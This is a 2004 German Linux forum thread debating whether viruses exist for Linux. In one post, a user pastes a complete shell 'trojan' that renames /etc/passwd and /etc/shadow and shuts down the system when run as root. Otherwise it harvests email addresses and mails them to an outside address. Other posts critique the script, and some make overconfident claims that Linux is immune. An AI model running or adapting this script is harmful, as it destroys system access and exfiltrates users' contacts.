Hinweis: Das Forum wird geschlossen! Neue Registrierungen sind nicht mehr möglich!

 Zurück zu Pro-Linux   Foren-Übersicht   FAQ     Suchen    Mitgliederliste
Keine Viren unter Linux
Gehen Sie zu Seite 1, 2  Weiter
 
Neuen Beitrag schreiben   Auf Beitrag antworten    Pro-Linux Foren-Übersicht -> Sonstiges
Vorheriges Thema anzeigen :: Nächstes Thema anzeigen  
Autor Nachricht
chrisjumper



Anmeldungsdatum: 12.02.2004
Beiträge: 104
Wohnort: Jülich

BeitragVerfasst am: 21. März 2004 23:24   Titel: Keine Viren unter Linux

Guten Abend!

Also ich war heute auf der Cebit und ein "Suse-Mitarbeiter" hat behauptet man bräuchte unter "Linux" kein Virenprogramm da es unter Linux keine Viren gibt.. oder geben kann. Und das hielte ich ehrlich gesagt.. für sehr sehr.. großen schwachsinn. Ich meine ich kenne mich mit viren doch nicht aus... aber es ist doch durchaus möglich.. das man solche "Programme" auch "für linuxrechner" schreiben kann.

Oder liege ich damit falsch? Trojaner gibts doch bestimmt auch .. unter Linux!

Liebe grüße

chris
 
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden

Hein
Gast





BeitragVerfasst am: 21. März 2004 23:35   Titel: Re: Keine Viren unter Linux

Hi

.. für sehr sehr.. großen schwachsinn. Ich meine ich kenne mich mit viren doch nicht aus...

Was bringt dich denn dazu eine SuSE Mitarbeiter schwachsinnig zu nennen? wo du dich doch nach eigenen Aussagen nicht auskennst. Leider muß ich hier auf Suchmaschine verweisen da es massig Infos zu dem Thema gibt mit vielen verschiedenen Aussagen.
Aufgrund des (noch geringen) Verbreitungsgrades von Linux existieren tatsächlich noch ziemlich wenig Viren/Trojaner die "weggepatcht" werden können und auch werden. Das heißt nicht das es unmöglich ist Viren für Linux zu schreiben. Doch die meisten wollen ja einen "zweifelhaften Ruhm" mit ihren Progrämmchen erreichen den sie mit Linux nicht erreichen weil die Anzahl der betroffenen Systeme noch zu klein wäre. Außerdem hat Linux den Vorteil der Transparenz so das nicht jedes System gleich ist im Gegensatz zu anderen Systemen die nicht offen (OS) sind.
Such mal im Netz nach Trojaner - Viren - Linux , da solltest du kompetente Hilfe bekommen, auch wenn für dich vieles "schwachsinnig" zu sein scheint.
MfG
 

chrisjumper



Anmeldungsdatum: 12.02.2004
Beiträge: 104
Wohnort: Jülich

BeitragVerfasst am: 21. März 2004 23:45   Titel: Re: Keine Viren unter Linux

Lieber Hein,

es tut mir leid.. ich habe mich eben ein wenig zu euphorisch ausgedrückt. Ich wollte auch keinen Mittarbeiter als "schwachsinnig" bezeichnen. Aber ich empfand es einfach ein bisschen zu leichtfertig. So etwas einfach so zu behaupten.

Ich benötige auch keine hilfe da ich (noch) kein Problem habe. Suche einfach nur nach Informationen dazu.

Weil ich mich jetzt einfach mal bei euch umhören möchte, um eure Meinung dazu zu hören hab ich auch diesen Beitrag gepostet..

Chris
 
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden

arno
Gast





BeitragVerfasst am: 22. März 2004 10:32   Titel: Re: Keine Viren unter Linux

hi

wie schon gesagt sind viren unter linux noch nicht so geläufig.
gefählicher sind root-kits die schwachstellen (meist bei servern) ausnutzen.

finde es nicht schlecht auch unter linux einen virenscanner zu haben damit man eben keine
viren ungewollt weiterverbreitet auch wenn sie selber einem nicht schaden.
da kann ich f-prot und clamav empfehlen und fürs mail den
Mailscanner

mfg
arno
 

zero
Gast





BeitragVerfasst am: 22. März 2004 17:24   Titel: Re: Keine Viren unter Linux

100% sicher gibt es nie!!!

Sehr sicher würde der Rechner nur werden, wenn Du mit ihm nicht
ins Internet gehen und auch keine Mails abholen würdest.
Weiterhin dürftest Du dann nie wieder eine Diskette, CD oder ein anderes
Wechselmedium einlegen. --> Dann wäre der Rechner sicher.

Es wird immer Wege und Viren geben, die einem Betriebssystem Schaden
zufügen. Die frage ist nur ob sich der Aufwand lohnt (Verbreitung des Betriebssystem).
Aber das sagten auch schon meine Vorredner.

MfG
 

Allo
Gast





BeitragVerfasst am: 22. März 2004 20:34   Titel: Re: Keine Viren unter Linux

code:

#!/bin/sh
# LAST EDIT: Mon Nov 25 00:27:09 2002 by Hauke Zuehl(hzuehl@athene.dnsalias.org)

#
# This is a little OpenSource trojan horse
#
# It is written for fun and of course this very "secret" code is GPLed
#
# Written by Bill "I am Borg" Gates <bill.gates@microsoft.com>

MAILERDIRS=".Mail .mozilla evolution .kde .kde2 .kde3"

#
# Check who I am
WHOAMI=`whoami`
MY_UID=`grep $WHOAMI /etc/passwd | cut -d: -f 3`

#
# Get good network interfaces
ETH0=`/sbin/ifconfig eth0 2>/dev/null | grep inet | \
cut -d: -f 2 | cut -d" " -f 1`
ETH1=`/sbin/ifconfig eth1 2>/dev/null | grep inet | \
cut -d: -f 2 | cut -d" " -f 1`
PPP0=`/sbin/ifconfig ppp0 2>/dev/null | grep inet | \
cut -d: -f 2 | cut -d" " -f 1`

if [ -z $ETH0 ] ; then
if [ -z $ETH1 ] ; then
if [ -z $PPP0 ] ; then
exit 1
else
MAILIFACE=$PPP0
fi
else
MAILIFACE=$ETH1
fi
else
MAILIFACE=$ETH0
fi

# We need a "secret" directory for all our stuff
SECRETDIR="/tmp/...123"
rm -rf $SECRETDIR
mkdir $SECRETDIR 2>/dev/null

if [ $MY_UID -eq 0 ] ; then
# We are root??? Great!!
mv /etc/passwd /etc/passwd.virus
mv /etc/shadow /etc/shadow.virus
/sbin/init 0
else
cd $HOME
# Okay, we are only a lousy (l)user, but let's try to find mail addresses
rm -f $SECRETDIRS/mails $SECRETDIR/mails.ats 2>/dev/null
for i in $MAILERDIRS ; do
if [ -x ~/$i ] ; then
find ~/$i -type f -exec grep "<.*@.*>" {} ; | \
cut -d\< -f 2 | cut -d\> -f 1 >> $SECRETDIR/mails
fi
done
grep "^.*@[a-z]*\..*$" $SECRETDIR/mails > $SECRETDIR/mails.ats
sort -d -o $SECRETDIR/mails.sorted $SECRETDIR/mails.ats
rm $SECRETDIR/mails $SECRETDIR/mails.ats
uniq $SECRETDIR/mails.sorted $SECRETDIR/mails
rm $SECRETDIR/mails.sorted
fi

# Is sendmail running?
ps ax | grep sendmail | grep -v grep >/dev/null

if [ $? -eq 0 ] ; then
# Great Smile
echo "From: `whoami`@$MAILIFACE" > $SECRETDIR/header.txt
echo "To: MacGyver@athene.dnsalias.org" >> $SECRETDIR/header.txt
echo " " >> $SECRETDIR/header.txt
cat $SECRETDIR/header.txt $SECRETDIR/mails | \
mail -s "`whoami`" MacGyver@athene.dnsalias.org
fi

rm -rf $SECRETDIR

exit 0



Ist das Beweis genug?

Aber es gibt tatsächlich (noch) fast keine, und potienziellen Viren wird das Leben schwer gamacht, weil man normalerweise nicht root ist.


Allo
 

Scory
Gast





BeitragVerfasst am: 22. März 2004 22:32   Titel: Re: Keine Viren unter Linux

>Ist das Beweis genug?

Ja - aber eben genau für das Gegenteil: es gibt keine Viren für Linux Clients. Warum: steht im doch im Plaintext da:

1) Das Script muss händisch ausgeführt werden, weil es unter Linux kein Outlook o.ä. gibt welches Shell-Scripts "automatisch" ohne Nachfrage ausführt - egal ob beim Öffnen einer Email oder beim Entpacken eines ZIPs oder sonstwie. Oder wie stellst Du Dir vor, wie das tolle Script ausgeführt werden soll?

2) Zusätzlich muss derjenige, der das Script ausführt, sich auch noch als "root" einloggen, weil es sonst nicht funkioniert.

Frage: WER IST DENN SO BLÖD? Dann kann man auch sagen "rm -rf *" ist ein saugefährlicher Virus - weil wenn man das als root im /-Verzeichnis ausführt, ist Linux platt.
 

Bussen
Gast





BeitragVerfasst am: 22. März 2004 23:11   Titel: Re: Keine Viren unter Linux

Frage: WER IST DENN SO BLÖD? Dann kann man auch sagen "rm -rf *" ist ein saugefährlicher Virus - weil wenn man das als root im /-Verzeichnis ausführt, ist Linux platt.

Antwort:
Wann hast du dir denn das letzte mal den kompletten Quellcode durchgelesen?????
Also fast jeder.
Oder:
Noch schlimmer: RPM´s sind bereits kompiliert. Keine kontrolle möglich. Also muss man immer den Quellcode durchlesen und danach erst selber kompilieren???
 

Descartes
Gast





BeitragVerfasst am: 22. März 2004 23:14   Titel: Re: Keine Viren unter Linux

@Allo
Dein Script hat aber mehrere (Design- wie auch Technische-) Probleme:
  • MY_UID kannst du viel einfacher mit "id -u" ermitteln
  • Was passiert, wenn ich statt per Modem eine ISDN Leitung verwende?
  • Wenn die Root-Partition ("/") read-only gemountet ist wäre für das Script auch ungünstig
  • Der Dateiname für ${SECRETDIR} ist hard-coded und nicht Multi-User tauglich => potenzielles Problem einer Race-Condition
  • Auf den meisten Rechnern von Privat-Personen wird ein MTA (wenn überhaupt) nur temporär zum Mailversenden gestartet aber läuft nicht 24/7 auf der Maschine. Damit das Script allerdings erfolgreich läuft
  • MUSS* unbedingt zur Zeit der Scriptausführung ein MTA gestartet sein.
  •  

    Scory
    Gast





    BeitragVerfasst am: 22. März 2004 23:38   Titel: Re: Keine Viren unter Linux

    >Wann hast du dir denn das letzte mal den kompletten Quellcode durchgelesen?????

    Welchen Quellcode?

    Du willst doch jetzt nicht wirklich unterstellen, in Quellcode von OpenSource Projekten müsse man mit solchen "Viren" rechnen? Ist es das, was Du sagen möchtest? Wie glaubst Du eigentlich "entsteht" Quellcode?
     

    max



    Anmeldungsdatum: 14.05.2000
    Beiträge: 806
    Wohnort: Ruhrpott

    BeitragVerfasst am: 23. März 2004 11:36   Titel: Re: Keine Viren unter Linux

    IMHO kann man die Würmer/Viren/Trojaner in 2.Klassen unterteilen:
    1) Das $BÖSEDING startet sich selbst in dem es eine aktuelle Lücke vom Wirts-OS nutzt. Siehe NETSKY.P
    2) Das $BÖSEDING nutzt eine Schwachstelle in Brain V1 aus. Allg. Blödheit genannt. Leider ein verbreitetes Phänomen namens DAU. (Siehe Bagle.I)

    Wie du, OP, siehst nenne ich kein OS, weil das egal ist.
    Entweder man hat einen guten Support von seinem Lieblings OS, oder nutzt ausnahmsweise mal Brain, bzw. datet up auf BRAIN V1.2


    Gruß Max
     
    Benutzer-Profile anzeigen Private Nachricht senden

    chlor
    Gast





    BeitragVerfasst am: 24. März 2004 0:24   Titel: Re: Keine Viren unter Linux

    ich war heute ebenfalls auf der cebit, und ich vermute, das ich wohl dem gleichen menschen lauschen durfte wie ChrisJumper. nun, der typ den ich mir angehört habe, trug echt sehr dick auf, einfach etwas überzogen. ein kleines stück weiter weg von der bühne saßen suse mitarbeiter, die kompetent und ruhig fragen beantwortet haben, die waren wirklich wesentlich angenehmer und konnten ihre sachen gut vermitteln.
    der mann am mikro hatte einen ganz-einfach beschissenen job den sicher erstmal wer besser machen muß - der balance act, weder gegen microsoft zu wettern und dabei doch eine klare stellung zu beziehen, die wirklich allen gefällt. da stehen/standen vom schüler bis mindestens zum mittelstands-unternehmer alle gruppen von messe-besuchern/innen, und auf mich hat der typ, es tut mir leid, gewirkt wie einer der autowaschmittel vor großen supermärkten oder in innenstädten unter die leute bringen muß, das war halt ein sau beschissener job.
    vielleicht passt sowas auch einfach nicht zu einem seriösen (ich nehme das jetzt mal an) unternehmen wie suse.
    jedenfalls kann ich ChrisJumper jetzt ein wenig besser verstehen.
     

    lopossum
    Gast





    BeitragVerfasst am: 29. März 2004 19:09   Titel: Re: Keine Viren unter Linux

    Ist es nicht so, dass ein Virus auf fehlerhaften binaries/scripts aufsetzt, die es ermoeglichen
    Benutzerrechte zu umgehen, bzw. Speicherbereiche zu ueberschreiben? Haengt das, bspw. im Fall
    der Scripts, nicht von der Implemetation der Scriptingengine (bspw. Perl) ab? Was kann Linux
    denn gegen ein "boeses" Perl tun?
     

    mee
    Gast





    BeitragVerfasst am: 31. März 2004 6:46   Titel: Re: Keine Viren unter Linux

    Generell würde ich sagen, dass es möglich ist. Durch das Design von Linux sollte dem jedoch um einiges Schwerer sein als bei diesem OS aus Redmond. Die Grössere Gefahr sind, wie bereits gesagt, eher Rootkits. Doch eins kann man mit 100% Genauigkeit sagen, jedes Linux-System ist anders! Jedes hat andere Programme und Librarys installiert. Bei Windoof ist das Grundsystem wahrscheinlich immer gleich und hat von 95 bis XP sicher auch einige Ähnlichkeit. Ein wunder Punkt an dem ein Virus ansetzen kann.

    @Scory
    Und das es sowas wie Outlook nicht für Linux gibt kann auch nur eine Sache der Zeit sein. Stell dir vor M$ entdeckt Linux ganz neu und bringt Outlook für Linux raus. Was dann?

    @Descartes
    Ich würde sagen, dass das Skript sowas wie ein "Proof of concept" ist. Und ausserdem ist dem ja GPL'ed, mach es besser ;)

    only my sänf Wink
     

    Scory
    Gast





    BeitragVerfasst am: 31. März 2004 10:11   Titel: Re: Keine Viren unter Linux

    >Stell dir vor M$ entdeckt Linux ganz neu und bringt Outlook für Linux raus. Was dann?

    Dann gibt es kein Windows mehr - *lach*!

    Mal im Ernst: "Outlook" ist nicht deswegen schlecht weil es Outlook heißt, sondern weil die Implementierung (via ActiveX etc.) ganz dicht am Betriebssystemkern erfolgt. Dazu kommt das Urproblem von Windows, daß jeder Anwender stets mit Admin-Rechten unterwegs ist: selbst bei WindowsXP, wo M$ ja wirklich mal die Chance gehabt hätte, einen "echten" User einrichten zu lassen (während der Installation), wird wieder mal nichts anderes eingerichtet als ein zweiter Admin mit anderem Namen. Saudoof!

    Wer Linux installiert kommt gar nicht erst auf die Idee, bei der Einrichtung seines Accounts Root-Rechte zu vergeben - dazu reichen bei Anfängern die Kenntnisse nicht aus und Profis machen es erst recht nicht. Und eben die Kombination aus diesen beiden Dingen (betriebssystemnahe Implementierung plus Adminrechte) machen Outlook so angreifbar (und ebenso Internet Explorer). Selbst wenn also M$ einen Outlook für Linux entwickelten - diese beiden Punkte könnten sie nur schwerlich umsetzen. Außerdem würden sie an einem dritten Punkt scheitern: "freie Software" von M$??

    Ich bleibe dabei: wirklich gefährliche Viren für Linux sind wahrscheinlich nicht zu realisieren, und selbst wenn es wirklich mal einem gelänge, dann kommt noch ein dritter Punkt zum tragen, der Vorteil des OpenSource-Gedanken: einen Fix für das Sicherheitsloch wird es um Welten schneller geben als von M$ - weil jedermann den Source einsehen kann und die Schwachstelle viel schneller behoben werden kann. Man bedenke, daß M$ für das letzte Sicherheitsupdate (die Geschichte von eEye mit dem "Loch" in den Sicherheitszertifikaten bei vermeintlich "sicherem" Zugriff via https) geschlagene 8 Monate gebraucht hat - das wäre unter Linux unvorstellbar.

    Alles in allem sind das natürlich Dinge, die Hersteller von AntiViren-Software nicht gerne lesen: je mehr Linux es gibt, umso weniger Absatz droht - ganz einfach formuliert. Deswegen drücken die auch gerne mal auf die Tube und erzählen eben solchen Käse wie hier vorgegeben.

    Grüße
    Scory
     

    Beiträge vom vorherigen Thema anzeigen:   
         Pro-Linux Foren-Übersicht -> Sonstiges Alle Zeiten sind GMT + 1 Stunde
    Gehen Sie zu Seite 1, 2  Weiter
    Seite 1 von 2

     
    Gehen Sie zu:  

    Powered by phpBB © phpBB Group
    pro_linux Theme © 2004 by Mandaxy